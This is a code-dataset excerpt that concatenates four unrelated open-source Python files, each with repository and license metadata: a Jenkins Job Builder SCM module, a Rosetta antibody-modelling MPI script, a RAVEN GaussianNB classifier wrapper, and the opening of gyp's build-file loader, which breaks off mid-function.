if pundle_type not in valid_pundle_types:
raise JenkinsJobsException(
'pundle type must be must be one of: '
+ ', '.join(valid_pundle_types))
else:
XML.SubElement(pundle, 'name').text = pundle_name
XML.SubElement(pundle, 'pundleType').text = pundle_type.upper()
if 'version-regex' in data:
XML.SubElement(scm, 'versionRegex').text = data['version-regex']
if 'minimum-blessing' in data:
XML.SubElement(scm, 'minimumBlessingLevel').text = \
data['minimum-blessing']
if 'parcel-builder-file' in data:
XML.SubElement(scm, 'generateParcelBuilderInputFile').text = 'true'
XML.SubElement(scm, 'parcelBuilderInputFilename').text = \
data['parcel-builder-file']
else:
XML.SubElement(scm, 'generateParcelBuilderInputFile').text = 'false'
def svn(parser, xml_parent, data):
"""yaml: svn
Specifies the svn SCM repository for this job.
:arg str url: URL of the svn repository
:arg str basedir: location relative to the workspace root to checkout to
(default '.')
:arg str credentials-id: optional argument to specify the ID of credentials
to use
:arg str repo-depth: Repository depth. Can be one of 'infinity', 'empty',
'files', 'immediates' or 'unknown'. (default 'infinity')
:arg bool ignore-externals: Ignore Externals. (default false)
:arg str workspaceupdater: optional argument to specify
:arg str workspaceupdater: optional argument to specify how to update the
workspace (default wipeworkspace)
:supported values:
* **wipeworkspace** - deletes the workspace before checking out
* **revertupdate** - do an svn revert then an svn update
* **emulateclean** - delete unversioned/ignored files then update
* **update** - do an svn update as much as possible
:arg list(str) excluded-users: list of users to ignore revisions from
when polling for changes (if polling is enabled; parameter is optional)
:arg list(str) included-regions: list of file/folders to include
(optional)
:arg list(str) excluded-regions: list of file/folders to exclude (optional)
:arg list(str) excluded-commit-messages: list of commit messages to exclude
(optional)
:arg str exclusion-revprop-name: revision svn-property to ignore (optional)
:arg bool ignore-property-changes-on-directories: ignore svn-property only
changes of directories (default false)
:arg bool filter-changelog: If set Jenkins will apply the same inclusion
and exclusion patterns for displaying changelog entries as it does for
polling for changes (default false)
:arg list repos: list of repositories to checkout (optional)
:arg str viewvc-url: URL of the svn web interface (optional)
:Repo:
* **url** (`str`) -- URL for the repository
* **basedir** (`str`) -- Location relative to the workspace root
to checkout to (default '.')
* **credentials-id** - optional ID of credentials to use
* **repo-depth** - Repository depth. Can be one of 'infinity',
'empty', 'files', 'immediates' or 'unknown'. (default 'infinity')
* **ignore-externals** - Ignore Externals. (default false)
Multiple repos example:
.. literalinclude:: /../../tests/scm/fixtures/svn-multiple-repos-001.yaml
Advanced commit filtering example:
.. literalinclude:: /../../tests/scm/fixtures/svn-regions-001.yaml
"""
scm = XML.SubElement(xml_parent, 'scm', {'class':
'hudson.scm.SubversionSCM'})
if 'viewvc-url' in data:
browser = XML.SubElement(
scm, 'browser', {'class': 'hudson.scm.browsers.ViewSVN'})
XML.SubElement(browser, 'url').text = data['viewvc-url']
locations = XML.SubElement(scm, 'locations')
def populate_repo_xml(parent, data):
module = XML.SubElement(parent,
'hudson.scm.SubversionSCM_-ModuleLocation')
XML.SubElement(module, 'remote').text = data['url']
XML.SubElement(module, 'local').text = data.get('basedir', '.')
if 'credentials-id' in data:
XML.SubElement(module, 'credentialsId').text = data[
'credentials-id']
repo_depths = ['infinity', 'empty', 'files', 'immediates', 'unknown']
repo_depth = data.get('repo-depth', 'infinity')
if repo_depth not in repo_depths:
raise InvalidAttributeError('repo_depth', repo_depth, repo_depths)
XML.SubElement(module, 'depthOption').text = repo_depth
XML.SubElement(module, 'ignoreExternalsOption').text = str(
data.get('ignore-externals', False)).lower()
if 'repos' in data:
repos = data['repos']
for repo in repos:
populate_repo_xml(locations, repo)
elif 'url' in data:
populate_repo_xml(locations, data)
else:
raise JenkinsJobsException("A top level url or repos list must exist")
updater = data.get('workspaceupdater', 'wipeworkspace')
if updater == 'wipeworkspace':
updaterclass = 'CheckoutUpdater'
elif updater == 'revertupdate':
updaterclass = 'UpdateWithRevertUpdater'
elif updater == 'emulateclean':
updaterclass = 'UpdateWithCleanUpdater'
elif updater == 'update':
updaterclass = 'UpdateUpdater'
XML.SubElement(scm, 'workspaceUpdater', {'class':
'hudson.scm.subversion.' + updaterclass})
mapping = [
# option, xml name, default value
("excluded-regions", 'excludedRegions', []),
("included-regions", 'includedRegions', []),
("excluded-users", 'excludedUsers', []),
("exclusion-revprop-name", 'excludedRevprop', ''),
("excluded-commit-messages", 'excludedCommitMessages', []),
("ignore-property-changes-on-directories", 'ignoreDirPropChanges',
False),
("filter-changelog", 'filterChangelog', False),
]
for optname, xmlname, defvalue in mapping:
if isinstance(defvalue, list):
val = '\n'.join(data.get(optname, defvalue))
else:
val = data.get(optname, defvalue)
# Skip adding xml entry if default is empty and no value given
if not val and (defvalue in ['', []]):
continue
xe = XML.SubElement(scm, xmlname)
if isinstance(defvalue, bool):
xe.text = str(val).lower()
else:
xe.text = str(val)
def tfs(parser, xml_parent, data):
"""yaml: tfs
Specifies the Team Foundation Server repository for this job.
Requires the Jenkins :jenkins-wiki:`Team Foundation Server Plugin
<Team+Foundation+Server+Plugin>`.
**NOTE**: TFS Password must be entered manually on the project if a
user name is specified. The password will be overwritten with an empty
value every time the job is rebuilt with Jenkins Job Builder.
:arg str server-url: The name or URL of the team foundation server.
If the server has been registered on the machine then it is only
necessary to enter the name.
:arg str project-path: The name of the project as it is registered on the
server.
:arg str login: The user name that is registered on the server. The user
name must contain the name and the domain name. Entered as
domain\\\\user or user\@domain (optional).
**NOTE**: You must enter in at least two slashes for the
domain\\\\user format in JJB YAML. It will be rendered normally.
:arg str use-update: If true, Hudson will not delete the workspace at end
of each build. This causes the artifacts from the previous build to
remain when a new build starts. (default true)
:arg str local-path: The folder where all files will be retrieved into.
The folder name is a relative path, under the workspace of the current
job. (default .)
:arg str workspace: The name of the workspace under which the source
should be retrieved. This workspace is created at the start of a
download, and deleted at the end. You can normally omit the property
unless you want to name a workspace to avoid conflicts on the server
(i.e. when you have multiple projects on one server talking to a
Team Foundation Server). (default Hudson-${JOB_NAME}-${NODE_NAME})
The TFS plugin supports the following macros that are replaced in the
workspace name:
* ${JOB_NAME} - The name of the job.
* ${USER_NAME} - The user name that the Hudson server or slave is
running as.
* ${NODE_NAME} - The name of the node/slave that the plugin currently
is executed on. Note that this is not the hostname, this value is
the Hudson configured name of the slave/node.
* ${ENV} - The environment variable that is set on the master or slave.
:arg dict web-access: Adds links in "changes" views within Jenkins to an
external system for browsing the details of those changes. The "Auto"
selection attempts to infer the repository browser from other jobs,
if supported by the SCM and a job with matching SCM details can be
found. (optional, default Auto).
:web-access value:
* **web-url** -- Enter the URL to the TSWA server. The plugin will
strip the last path (if any) of the URL when building URLs for
change set pages and other pages. (optional, default
uses server-url)
Examples:
.. literalinclude:: /../../tests/scm/fixtures/tfs-001.yaml
.. literalinclude:: /../../tests/scm/fixtures/tfs-002.yaml
"""
tfs = XML.SubElement(xml_parent, 'scm',
{'class': 'hudson.plugins.tfs.'
'TeamFoundationServerScm'})
XML.SubElement(tfs, 'serverUrl').text = str(
data.get('server-url', ''))
XML.SubElement(tfs, 'projectPath').text = str(
data.get('project-path', ''))
XML.SubElement(tfs, 'localPath').text = str(
data.get('local-path', '.'))
XML.SubElement(tfs, 'workspaceName').text = str(
data.get('workspace', 'Hudson-${JOB_NAME}-${NODE_NAME}'))
# TODO: In the future, with would be nice to have a place that can pull
# passwords into JJB without having to commit them in plaintext. This
# could also integrate nicely with global configuration options.
XML.SubElement(tfs, 'userPassword')
XML.SubElement(tfs, 'userName').text = str(
data.get('login', ''))
XML.SubElement(tfs, 'useUpdate').text = str(
data.get('use-update', True))
store = data.get('web-access', None)
if 'web-access' in data and isinstance(store, list):
web = XML.SubElement(tfs, 'repositoryBrowser',
{'class': 'hudson.plugins.tfs.browsers.'
'TeamSystemWebAccessBrowser'})
XML.SubElement(web, 'url').text = str(store[0].get('web-url', None))
elif 'web-access' in data and store is None:
XML.SubElement(tfs, 'repositoryBrowser', {'class': 'hudson.'
'plugins.tfs.browsers.'
'TeamSystemWebAccess'
'Browser'})
def workspace(parser, xml_parent, data):
"""yaml: workspace
Specifies the cloned workspace for this job to use as a SCM source.
Requires the Jenkins :jenkins-wiki:`Clone Workspace SCM Plugin
<Clone+Workspace+SCM+Plugin>`.
The job the workspace is cloned from must be configured with an
clone-workspace publisher
:arg str parent-job: The name of the parent job to clone the
workspace from.
:arg str criteria: Set the criteria to determine what build of the parent
project to use. Can be one of 'Any', 'Not Failed' or 'Successful'.
(default: Any)
Example:
.. literalinclude:: /../../tests/scm/fixtures/workspace001.yaml
"""
workspace = XML.SubElement(xml_parent, 'scm', {'class': 'hudson.plugins.'
'cloneworkspace.CloneWorkspaceSCM'})
XML.SubElement(workspace, 'parentJobName').text = str(
data.get('parent-job', ''))
criteria_list = ['Any', 'Not Failed', 'Successful']
criteria = data.get('criteria', 'Any').title()
if 'criteria' in data and criteria not in criteria_list:
raise JenkinsJobsException(
'clone-workspace criteria must be one of: '
+ ', '.join(criteria_list))
else:
XML.SubElement(workspace, 'criteria').text = criteria
def hg(self, xml_parent, data):
"""yaml: hg
Specifies the mercurial SCM repository for this job.
Requires the Jenkins :jenkins-wiki:`Mercurial Plugin <Mercurial+Plugin>`.
:arg str url: URL of the hg repository
:arg str credentials-id: ID of credentials to use to connect (optional)
:arg str revision-type: revision type to use (default 'branch')
:arg str revision: the branch or tag name you would like to track
(default 'default')
:arg list(str) modules: reduce unnecessary builds by specifying a list of
"modules" within the repository. A module is a directory name within
the repository that this project lives in. (default '')
:arg bool clean: wipe any local modifications or untracked files in the
repository checkout (default false)
:arg str subdir: check out the Mercurial repository into this
subdirectory of the job's workspace (optional)
:arg bool disable-changelog: do not calculate the Mercurial changelog
for each build (default false)
:arg str browser: what repository browser to use
:browsers supported:
* **auto** - (default)
* **bitbucketweb** - https://www.bitbucket.org/
* **fisheye** - https://www.atlassian.com/software/fisheye
* **googlecode** - https://code.google.com/
* **hgweb** - https://www.selenic.com/hg/help/hgweb
* **kilnhg** - https://www.fogcreek.com/kiln/
* **rhodecode** - https://rhodecode.com/ (versions >= 1.2)
* **rhodecode-pre-1.2.0** - https://rhodecode.com/ (versions < 1.2)
:arg str browser-url: url for the repository browser
(required if browser is set)
Example:
.. literalinclude:: ../../tests/scm/fixtures/hg02.yaml
"""
scm = XML.SubElement(xml_parent, 'scm', {'class':
'hudson.plugins.mercurial.MercurialSCM'})
if 'url' in data:
XML.SubElement(scm, 'source').text = data['url']
else:
raise JenkinsJobsException("A top level url must exist")
if 'credentials-id' in data:
XML.SubElement(scm, 'credentialsId').text = data['credentials-id']
revision_type_dict = {
'branch': 'BRANCH',
'tag': 'TAG',
}
try:
revision_type = revision_type_dict[data.get('revision-type', 'branch')]
except KeyError:
raise JenkinsJobsException('Invalid revision-type %r' %
data.get('revision-type'))
XML.SubElement(scm, 'revisionType').text = revision_type
XML.SubElement(scm, 'revision').text = data.get('revision', 'default')
if 'subdir' in data:
XML.SubElement(scm, 'subdir').text = data['subdir']
xc = XML.SubElement(scm, 'clean')
xc.text = str(data.get('clean', False)).lower()
modules = data.get('modules', '')
if isinstance(modules, list):
modules = " ".join(modules)
XML.SubElement(scm, 'modules').text = modules
xd = XML.SubElement(scm, 'disableChangeLog')
xd.text = str(data.get('disable-changelog', False)).lower()
browser = data.get('browser', 'auto')
browserdict = {
'auto': '',
'bitbucket': 'BitBucket',
'fisheye': 'FishEye',
'googlecode': 'GoogleCode',
'hgweb': 'HgWeb',
'kilnhg': 'KilnHG',
'rhodecode': 'RhodeCode',
'rhodecode-pre-1.2.0': 'RhodeCodeLegacy'
}
if browser not in browserdict:
raise JenkinsJobsException("Browser entered is not valid must be one "
"of: %s" % ", ".join(browserdict.keys()))
if browser != 'auto':
bc = XML.SubElement(scm, 'browser',
{'class': 'hudson.plugins.mercurial.browser.' +
browserdict[browser]})
if 'browser-url' in data:
XML.SubElement(bc, 'url').text = data['browser-url']
else:
raise JenkinsJobsException("A browser-url must be specified along "
"with browser.")
class SCM(jenkins_jobs.modules.base.Base):
sequence = 30
component_type = 'scm'
component_list_type = 'scm'
def gen_xml(self, parser, xml_parent, data):
scms_parent = XML.Element('scms')
for scm in data.get('scm', []):
self.registry.dispatch('scm', parser, scms_parent, scm)
scms_count = len(scms_parent)
if scms_count == 0:
XML.SubElement(xml_parent, 'scm', {'class': 'hudson.scm.NullSCM'})
elif scms_count == 1:
xml_parent.append(scms_parent[0])
else:
class_name = 'org.jenkinsci.plugins.multiplescms.MultiSCM'
xml_attribs = {'class': class_name}
xml_parent = XML.SubElement(xml_parent, 'scm', xml_attribs)
xml_parent.append(scms_parent)
|
madAndroid/jenkins-job-builder
|
jenkins_jobs/modules/scm.py
|
Python
|
apache-2.0
| 49,040
|
[
"Octopus"
] |
ffa986cd83d22ce6e280544e0bbeb833ec360425cf3ab2bdcff956bf40b68a8e
|
from mpi4py import MPI
import sys
import os
import glob
import subprocess
import shutil
def cleanPDB(pdbfile):
# This function will look for and remove duplicate atoms
# It will permanently modify the PDB that the user loaded
# This shouldn't cause problems for other programs though
data = []
taken_nums = {}
num_mapping = {}
# Sometimes there are PDBs that have multiple residues with the same residue index
# BioPython drops these, but it can lead to all kinds of problems later on
# So I will keep a record of the backbone atoms of the current residue and if we encounter
# a BB atom with the same residue index, we will assume it's a new residue and renumber the residue
lastBBatoms = []
altlocs_taken = ""
f = open(pdbfile.strip(), "r")
curr_res = " 0"
for aline in f:
if (aline.startswith("ATOM") or aline.startswith("HETATM")):
res = aline[22:27] # Includes residue indx + the optional alternate letter
if (res[0:4] != curr_res[0:4]): # New residue indx
altlocs_taken = res[4] # Reset the taken altlocs
curr_res = res
atomtypes = []
lastBBatoms = []
# This is only done if this is a new residue, but not a new residue indx
if (aline[22:27] != curr_res or aline[12:16] in lastBBatoms):
curr_res = res
atomtypes = []
lastBBatoms = []
# Assign the altloc to whatever the most recent altloc used was
for char in " ABCDEFGHIJKLMNOPQRSTUVWXYZ":
if (not(char in altlocs_taken)):
altlocs_taken = char + altlocs_taken
break
res = res[0:4] + altlocs_taken[0]
atomtype = aline[12:16]
if (atomtype in [" C ", " CA ", " O ", " N "]):
lastBBatoms.append(atomtype)
if (atomtype in atomtypes):
# Find a new type for this atom
stem = atomtype[0:2]
for i in range(1, 100):
if (i < 10):
newtype = stem + str(i) + " "
else:
newtype = stem + str(i)
if (not(newtype in atomtypes)):
atomtypes.append(newtype)
break
aline = aline[0:12] + newtype + aline[16:]
else:
atomtypes.append(atomtype)
# Now check for alternate forms of residues (i.e. 30A, 30B, etc.)
# Rename these so the each have a unique number, the user can delete extras later
chain = aline[21]
if (not(chain in taken_nums.keys())):
taken_nums[chain] = []
if (not(res[0:4] in taken_nums[chain])):
taken_nums[chain].append(res[0:4])
num_mapping[chain+res] = res[0:4]
else:
try:
aline = aline[0:22] + num_mapping[chain+res] + " " + aline[27:]
except:
# Find a new ID
lastnum = int(taken_nums[chain][len(taken_nums[chain])-1]) + 1
num_mapping[chain+res] = "%4i" % lastnum
taken_nums[chain].append("%4i" % lastnum)
aline = aline[0:22] + num_mapping[chain+res] + " " + aline[27:]
#data.append(aline.strip())
#else:
data.append(aline.strip())
f.close()
# Now write the updated data out
f = open(pdbfile.strip(), "w")
for aline in data:
f.write(aline + "\n")
f.close()
if (len(sys.argv) != 8):
print "Usage: mpirun python antibody_mpi.py modelname ndecoys <light-chain.fasta> <heavy-chain.fasta> antibody_path rosetta_path rosettadb_path"
exit()
modelname = sys.argv[1].strip()
ndecoys = int(sys.argv[2])
lightchain = sys.argv[3].strip()
heavychain = sys.argv[4].strip()
antibody = sys.argv[5].strip()
rosetta = sys.argv[6].strip()
# Try to find the default, single processor Rosetta binary
platform = None
binaries = glob.glob(rosetta + "/antibody_graft.default.*")
if (len(binaries) > 0):
platform = binaries[0].split("antibody_graft")[1]
platform = platform[1:] # Get rid of the leading .
else:
binaries = glob.glob(rosetta + "/antibody_graft.static.*")
if (len(binaries) > 0):
platform = binaries[0].split("antibody_graft")[1]
platform = platform[1:] # Get rid of the leading
rosettadb = sys.argv[7].strip()
noderank = MPI.COMM_WORLD.Get_rank()
nodesize = MPI.COMM_WORLD.Get_size()
print "platform=" + platform
for i in range(noderank, ndecoys, nodesize):
# Note to future developers: the --rosetta-platform argument is essential
# If you do not include it, it will default to <rosetta_executable>.linuxgccrelease
# This a problem, because that executable is whatever the last build type was
# So if the last build was the MPI build (what it usually is), then that executable is the MPI one
# If you try to run the MPI executable within a Python script that is mpi4py aware, it crashes
if (platform):
ABargs = "python " + antibody + "/antibody.py --light-chain " + lightchain + " --heavy-chain " + heavychain + " --antibody-database=" + antibody + "/antibody_database --blast-database=" + antibody + "/blast_database --rosetta-platform=" + platform + " --rosetta-bin=" + rosetta + " --rosetta-database=" + rosettadb + " --prefix=grafting" + str(i+1) + "/"
else:
ABargs = "python " + antibody + "/antibody.py --light-chain " + lightchain + " --heavy-chain " + heavychain + " --antibody-database=" + antibody + "/antibody_database --blast-database=" + antibody + "/blast_database --rosetta-bin=" + rosetta + " --rosetta-database=" + rosettadb + " --prefix=grafting" + str(i+1) + "/"
print "Starting antibody model " + str(i+1) + "..."
f = open("out" + str(i), "w")
f.write(ABargs + "\n")
f.close()
(out, err) = subprocess.Popen(ABargs, shell=True, stdout=subprocess.PIPE).communicate()
print ABargs
# The Chothia numbering gives rise to duplicate residues, that BioPython cannot process
# This gives all the residues unique numbers so they are not issues later on
cleanPDB("grafting" + str(i+1) + "/grafted.relaxed.pdb")
os.rename("grafting" + str(i+1) + "/grafted.relaxed.pdb", modelname + ("_%4.4i" % (i+1)) + ".pdb")
shutil.rmtree("grafting" + str(i+1), ignore_errors=True)
MPI.Finalize()
|
schenc3/InteractiveROSETTA
|
InteractiveROSETTA/server/antibody_mpi.py
|
Python
|
gpl-2.0
| 6,537
|
[
"BLAST",
"Biopython"
] |
b55e4e22fcde19fa603a5c1015410db48b5db39de183c87621a1daa809055760
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Jan 21, 2020
@author: alfoa, wangc
GaussianNB Classifier
Gaussian Naive Bayes (GaussianNB) classifier
"""
#Internal Modules (Lazy Importer)--------------------------------------------------------------------
#Internal Modules (Lazy Importer) End----------------------------------------------------------------
#External Modules------------------------------------------------------------------------------------
#External Modules End--------------------------------------------------------------------------------
#Internal Modules------------------------------------------------------------------------------------
from SupervisedLearning.ScikitLearn import ScikitLearnBase
from utils import InputData, InputTypes
#Internal Modules End--------------------------------------------------------------------------------
class GaussianNB(ScikitLearnBase):
"""
GaussianNB Classifier
Gaussian Naive Bayes (GaussianNB) classifier
"""
info = {'problemtype':'classification', 'normalize':True}
def __init__(self):
"""
Constructor that will appropriately initialize a supervised learning object
@ In, None
@ Out, None
"""
super().__init__()
import sklearn
import sklearn.naive_bayes
self.model = sklearn.naive_bayes.GaussianNB
@classmethod
def getInputSpecification(cls):
"""
Method to get a reference to a class that specifies the input data for
class cls.
@ In, cls, the class for which we are retrieving the specification
@ Out, inputSpecification, InputData.ParameterInput, class to use for
specifying input of cls.
"""
specs = super(GaussianNB, cls).getInputSpecification()
specs.description = r"""The \\textit{GaussianNB} classifier implements the Gaussian Naive Bayes
algorithm for classification.
The likelihood of the features is assumed to be Gaussian:
\begin{equation}
P(x_i \mid y) = \frac{1}{\sqrt{2\pi\sigma^2_y}} \exp\left(-\frac{(x_i -
\mu_y)^2}{2\sigma^2_y}\right)
\end{equation}
The parameters $\sigma_y$ and $\mu_y$ are estimated using maximum likelihood.
\zNormalizationPerformed{GaussianNB}
"""
specs.addSub(InputData.parameterInputFactory("priors", contentType=InputTypes.FloatListType,
descr=r"""Prior probabilities of the classes. If specified the priors are
not adjusted according to the data. \nb the number of elements inputted here must
match the number of classes in the data set used in the training stage.""", default=None))
specs.addSub(InputData.parameterInputFactory("var_smoothing", contentType=InputTypes.FloatType,
descr=r"""Portion of the largest variance of all features that is added to variances for
calculation stability.""", default=1e-9))
return specs
def _handleInput(self, paramInput):
"""
Function to handle the common parts of the distribution parameter input.
@ In, paramInput, ParameterInput, the already parsed input.
@ Out, None
"""
super()._handleInput(paramInput)
settings, notFound = paramInput.findNodesAndExtractValues(['priors', 'var_smoothing'])
# notFound must be empty
assert(not notFound)
self.initializeModel(settings)
|
idaholab/raven
|
framework/SupervisedLearning/ScikitLearn/NaiveBayes/GaussianNBClassifier.py
|
Python
|
apache-2.0
| 4,245
|
[
"Gaussian"
] |
8c5871c82791ba9cc83703258827a5c150f6931c2e3e5d10947b3d45b41fd4f2
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
import ast
import gyp.common
import gyp.simple_copy
import multiprocessing
import os.path
import re
import shlex
import signal
import subprocess
import sys
import threading
import traceback
from distutils.version import StrictVersion
from gyp.common import GypError
from gyp.common import OrderedSet
PY3 = bytes != str
# A list of types that are treated as linkable.
linkable_types = [
"executable",
"shared_library",
"loadable_module",
"mac_kernel_extension",
"windows_driver",
]
# A list of sections that contain links to other targets.
dependency_sections = ["dependencies", "export_dependent_settings"]
# base_path_sections is a list of sections defined by GYP that contain
# pathnames. The generators can provide more keys, the two lists are merged
# into path_sections, but you should call IsPathSection instead of using either
# list directly.
base_path_sections = [
"destination",
"files",
"include_dirs",
"inputs",
"libraries",
"outputs",
"sources",
]
path_sections = set()
# These per-process dictionaries are used to cache build file data when loading
# in parallel mode.
per_process_data = {}
per_process_aux_data = {}
def IsPathSection(section):
# If section ends in one of the '=+?!' characters, it's applied to a section
# without the trailing characters. '/' is notably absent from this list,
# because there's no way for a regular expression to be treated as a path.
while section and section[-1:] in "=+?!":
section = section[:-1]
if section in path_sections:
return True
# Sections mathing the regexp '_(dir|file|path)s?$' are also
# considered PathSections. Using manual string matching since that
# is much faster than the regexp and this can be called hundreds of
# thousands of times so micro performance matters.
if "_" in section:
tail = section[-6:]
if tail[-1] == "s":
tail = tail[:-1]
if tail[-5:] in ("_file", "_path"):
return True
return tail[-4:] == "_dir"
return False
# base_non_configuration_keys is a list of key names that belong in the target
# itself and should not be propagated into its configurations. It is merged
# with a list that can come from the generator to
# create non_configuration_keys.
base_non_configuration_keys = [
# Sections that must exist inside targets and not configurations.
"actions",
"configurations",
"copies",
"default_configuration",
"dependencies",
"dependencies_original",
"libraries",
"postbuilds",
"product_dir",
"product_extension",
"product_name",
"product_prefix",
"rules",
"run_as",
"sources",
"standalone_static_library",
"suppress_wildcard",
"target_name",
"toolset",
"toolsets",
"type",
# Sections that can be found inside targets or configurations, but that
# should not be propagated from targets into their configurations.
"variables",
]
non_configuration_keys = []
# Keys that do not belong inside a configuration dictionary.
invalid_configuration_keys = [
"actions",
"all_dependent_settings",
"configurations",
"dependencies",
"direct_dependent_settings",
"libraries",
"link_settings",
"sources",
"standalone_static_library",
"target_name",
"type",
]
# Controls whether or not the generator supports multiple toolsets.
multiple_toolsets = False
# Paths for converting filelist paths to output paths: {
# toplevel,
# qualified_output_dir,
# }
generator_filelist_paths = None
def GetIncludedBuildFiles(build_file_path, aux_data, included=None):
"""Return a list of all build files included into build_file_path.
The returned list will contain build_file_path as well as all other files
that it included, either directly or indirectly. Note that the list may
contain files that were included into a conditional section that evaluated
to false and was not merged into build_file_path's dict.
aux_data is a dict containing a key for each build file or included build
file. Those keys provide access to dicts whose "included" keys contain
lists of all other files included by the build file.
included should be left at its default None value by external callers. It
is used for recursion.
The returned list will not contain any duplicate entries. Each build file
in the list will be relative to the current directory.
"""
if included is None:
included = []
if build_file_path in included:
return included
included.append(build_file_path)
for included_build_file in aux_data[build_file_path].get("included", []):
GetIncludedBuildFiles(included_build_file, aux_data, included)
return included
def CheckedEval(file_contents):
"""Return the eval of a gyp file.
The gyp file is restricted to dictionaries and lists only, and
repeated keys are not allowed.
Note that this is slower than eval() is.
"""
syntax_tree = ast.parse(file_contents)
assert isinstance(syntax_tree, ast.Module)
c1 = syntax_tree.body
assert len(c1) == 1
c2 = c1[0]
assert isinstance(c2, ast.Expr)
return CheckNode(c2.value, [])
def CheckNode(node, keypath):
if isinstance(node, ast.Dict):
dict = {}
for key, value in zip(node.keys, node.values):
assert isinstance(key, ast.Str)
key = key.s
if key in dict:
raise GypError(
"Key '"
+ key
+ "' repeated at level "
+ repr(len(keypath) + 1)
+ " with key path '"
+ ".".join(keypath)
+ "'"
)
kp = list(keypath) # Make a copy of the list for descending this node.
kp.append(key)
dict[key] = CheckNode(value, kp)
return dict
elif isinstance(node, ast.List):
children = []
for index, child in enumerate(node.elts):
kp = list(keypath) # Copy list.
kp.append(repr(index))
children.append(CheckNode(child, kp))
return children
elif isinstance(node, ast.Str):
return node.s
else:
raise TypeError(
"Unknown AST node at key path '" + ".".join(keypath) + "': " + repr(node)
)
def LoadOneBuildFile(build_file_path, data, aux_data, includes, is_target, check):
if build_file_path in data:
return data[build_file_path]
if os.path.exists(build_file_path):
# Open the build file for read ('r') with universal-newlines mode ('U')
# to make sure platform specific newlines ('\r\n' or '\r') are converted to '\n'
# which otherwise will fail eval()
if sys.platform == "zos":
# On z/OS, universal-newlines mode treats the file as an ascii file. But since
# node-gyp produces ebcdic files, do not use that mode.
build_file_contents = open(build_file_path, "r").read()
else:
build_file_contents = open(build_file_path, "rU").read()
else:
raise GypError("%s not found (cwd: %s)" % (build_file_path, os.getcwd()))
build_file_data = None
try:
if check:
build_file_data = CheckedEval(build_file_contents)
else:
build_file_data = eval(build_file_contents, {"__builtins__": {}}, None)
except SyntaxError as e:
e.filename = build_file_path
raise
except Exception as e:
gyp.common.ExceptionAppend(e, "while reading " + build_file_path)
raise
if type(build_file_data) is not dict:
raise GypError("%s does not evaluate to a dictionary." % build_file_path)
data[build_file_path] = build_file_data
aux_data[build_file_path] = {}
# Scan for includes and merge them in.
if "skip_includes" not in build_file_data or not build_file_data["skip_includes"]:
try:
if is_target:
LoadBuildFileIncludesIntoDict(
build_file_data, build_file_path, data, aux_data, includes, check
)
else:
LoadBuildFileIncludesIntoDict(
build_file_data, build_file_path, data, aux_data, None, check
)
except Exception as e:
gyp.common.ExceptionAppend(
e, "while reading includes of " + build_file_path
)
raise
return build_file_data
def LoadBuildFileIncludesIntoDict(
subdict, subdict_path, data, aux_data, includes, check
):
includes_list = []
if includes is not None:
includes_list.extend(includes)
if "includes" in subdict:
for include in subdict["includes"]:
# "include" is specified relative to subdict_path, so compute the real
# path to include by appending the provided "include" to the directory
# in which subdict_path resides.
relative_include = os.path.normpath(
os.path.join(os.path.dirname(subdict_path), include)
)
includes_list.append(relative_include)
# Unhook the includes list, it's no longer needed.
del subdict["includes"]
# Merge in the included files.
for include in includes_list:
if "included" not in aux_data[subdict_path]:
aux_data[subdict_path]["included"] = []
aux_data[subdict_path]["included"].append(include)
gyp.DebugOutput(gyp.DEBUG_INCLUDES, "Loading Included File: '%s'", include)
MergeDicts(
subdict,
LoadOneBuildFile(include, data, aux_data, None, False, check),
subdict_path,
include,
)
# Recurse into subdictionaries.
for k, v in subdict.items():
if type(v) is dict:
LoadBuildFileIncludesIntoDict(v, subdict_path, data, aux_data, None, check)
elif type(v) is list:
LoadBuildFileIncludesIntoList(v, subdict_path, data, aux_data, check)
# This recurses into lists so that it can look for dicts.
def LoadBuildFileIncludesIntoList(sublist, sublist_path, data, aux_data, check):
for item in sublist:
if type(item) is dict:
LoadBuildFileIncludesIntoDict(
item, sublist_path, data, aux_data, None, check
)
elif type(item) is list:
LoadBuildFileIncludesIntoList(item, sublist_path, data, aux_data, check)
# Processes toolsets in all the targets. This recurses into condition entries
# since they can contain toolsets as well.
def ProcessToolsetsInDict(data):
if "targets" in data:
target_list = data["targets"]
new_target_list = []
for target in target_list:
# If this target already has an explicit 'toolset', and no 'toolsets'
# list, don't modify it further.
if "toolset" in target and "toolsets" not in target:
new_target_list.append(target)
continue
if multiple_toolsets:
toolsets = target.get("toolsets", ["target"])
else:
toolsets = ["target"]
# Make sure this 'toolsets' definition is only processed once.
if "toolsets" in target:
del target["toolsets"]
if len(toolsets) > 0:
# Optimization: only do copies if more than one toolset is specified.
for build in toolsets[1:]:
new_target = gyp.simple_copy.deepcopy(target)
new_target["toolset"] = build
new_target_list.append(new_target)
target["toolset"] = toolsets[0]
new_target_list.append(target)
data["targets"] = new_target_list
if "conditions" in data:
for condition in data["conditions"]:
if type(condition) is list:
for condition_dict in condition[1:]:
if type(condition_dict) is dict:
ProcessToolsetsInDict(condition_dict)
# TODO(mark): I don't love this name. It just means that it's going to load
# a build file that contains targets and is expected to provide a targets dict
# that contains the targets...
def LoadTargetBuildFile(
build_file_path,
data,
aux_data,
variables,
includes,
depth,
check,
load_dependencies,
):
# If depth is set, predefine the DEPTH variable to be a relative path from
# this build file's directory to the directory identified by depth.
if depth:
# TODO(dglazkov) The backslash/forward-slash replacement at the end is a
# temporary measure. This should really be addressed by keeping all paths
# in POSIX until actual project generation.
d = gyp.common.RelativePath(depth, os.path.dirname(build_file_path))
if d == "":
variables["DEPTH"] = "."
else:
variables["DEPTH"] = d.replace("\\", "/")
# The 'target_build_files' key is only set when loading target build files in
# the non-parallel code path, where LoadTargetBuildFile is called
# recursively. In the parallel code path, we don't need to check whether the
# |build_file_path| has already been loaded, because the 'scheduled' set in
# ParallelState guarantees that we never load the same |build_file_path|
# twice.
if "target_build_files" in data:
if build_file_path in data["target_build_files"]:
# Already loaded.
return False
data["target_build_files"].add(build_file_path)
gyp.DebugOutput(
